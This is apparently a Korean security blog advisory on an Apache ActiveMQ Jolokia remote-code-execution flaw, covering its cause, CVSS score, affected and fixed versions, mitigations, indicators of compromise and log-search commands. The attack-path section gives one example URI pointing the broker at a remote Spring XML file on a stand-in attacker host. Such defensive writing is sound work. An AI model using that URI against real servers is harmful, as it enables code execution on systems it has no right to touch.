DEEP DIVE REPORT

Apache ActiveMQ CVE-2026-34197 취약점 심층 분석

SecurityDesk
2026.04.20 조회 23

취약점 개요

Apache ActiveMQ의 Jolokia JMX-HTTP 브릿지 취약점(CVE-2026-34197)은 인증된 사용자가 BrokerService MBean을 조작하여 Spring XML 컨텍스트를 로드하고 임의 코드 실행(RCE)을 할 수 있습니다. CISA KEV 카탈로그에 등록되었으며 2026년 4월 30일까지 완화 조치가 필요합니다.

기술적 분석

취약점 원인

Apache ActiveMQ Classic은 /api/jolokia/ 경로를 통해 Jolokia JMX-HTTP 브릿지를 노출합니다. 기본 Jolokia 액세스 정책은 모든 ActiveMQ MBean에 대해 exec 작업을 허용합니다.

공격 경로

  1. 인증된 액세스 확보
  2. crafted discovery URI 사용 (vm://broker1?brokerConfig=http://evil.com/malicious.xml)
  3. Spring XML 로드 및 singleton bean 즉시 초기화
  4. SpEL 표현식 실행 → Runtime.exec() 호출

CVSS v3.1 점수

  • Base Score: 8.8 (HIGH)
  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: Low
  • User Interaction: None
  • Scope: Changed
  • Confidentiality/Integrity/Availability: High

영향 시스템

취약한 버전

  • Apache ActiveMQ 5.19.4 이전
  • Apache ActiveMQ 6.0.0 이상 ~ 6.2.3 이전

보안 버전

  • Apache ActiveMQ 5.19.4 이상
  • Apache ActiveMQ 6.2.3 이상

대응 전략

영구 대응

  1. 패치 적용: 보안 버전으로 업그레이드
  2. 5.x → 5.19.4 이상

  3. 6.x → 6.2.3 이상

  4. Jolokia 비활성화: activemq.xml에서 jolokia 액세스 제거

  5. 웹 콘솔 비활성화: 불필요한 경우 8161 포트 폐쇄

임시 대응

  1. Jolokia API 차단: /api/jolokia/* 경로 방화벽 차단
  2. 네트워크 분리: 인터넷 노출 제한
  3. 강력한 인증: 기본 자격증명 변경, MFA 적용

탐지/대응 방안

IOC (Indicators of Compromise)

  1. 네트워크 로그
  2. /api/jolokia/ 경로에 대한 비정상적인 POST 요청
  3. addConnector, addNetworkConnector 작업 호출

  4. VM transport URI 패턴: vm://*?brokerConfig=http://*

  5. 시스템 로그

  6. Spring XML 로드 관련 예외 메시지
  7. ResourceXmlApplicationContext 관련 로그

  8. 의심스러운 프로세스 실행 (calc.exe, PowerShell 등)

  9. ActiveMQ 로그

  10. BrokerService 커넥터 추가 로그
  11. VM transport 초기화 로그

로그 분석 예시

# Jolokia API 요청 확인
grep "POST /api/jolokia" /var/log/activemq/audit.log

# VM transport 사용 확인
grep "vm://.*brokerConfig=" /var/log/activemq/activemq.log

# Spring XML 로드 확인
grep "ResourceXmlApplicationContext" /var/log/activemq/activemq.log

대응 절차

  1. 즉시 대응
  2. 영향 시스템 격리
  3. 네트워크 연결 차단
  4. 인증된 모든 세션 무효화

  5. 자격증명 강제 재설정

  6. 포렌식 분석

  7. 로그 분석 (악성 활동 확인)
  8. 시스템 이미지 수집

  9. 프로세스 히스토리 검토

  10. 복구

  11. 패치 적용 후 시스템 재시작
  12. 보안 설정 강화
  13. 모니터링 강화

본 콘텐츠는 AI 기술로 작성된 분석 리포트를 포함하고 있습니다. 내용 중 사실과 다르거나 보완이 필요한 정보를 발견하셨으면 댓글을 통해 의견을 부탁드립니다. 여러분의 피드백은 더 정확한 보안 정보 공유에 큰 도움이 됩니다.

← 목록으로 돌아가기

댓글 (0)

댓글을 작성하려면 로그인이 필요합니다.

로그인

아직 댓글이 없습니다.

첫 번째 댓글을 작성해보세요!

IT 도구 서랍

→ Unix: 2025-01-15T09:30:00
→ 날짜: 1736934600

→ ASCII: ABC
→ 문자: 65 66 67

ASCII 코드표 — 클릭하면 입력란에 추가

제어 문자 (0–31)

DecHex약어설명

출력 가능 문자 (32–126)

DecHex문자

확장 ASCII (128–255)

DecHex문자

→ 유니코드: 홍길동
→ 문자: \ud64d\uae38\ub3d9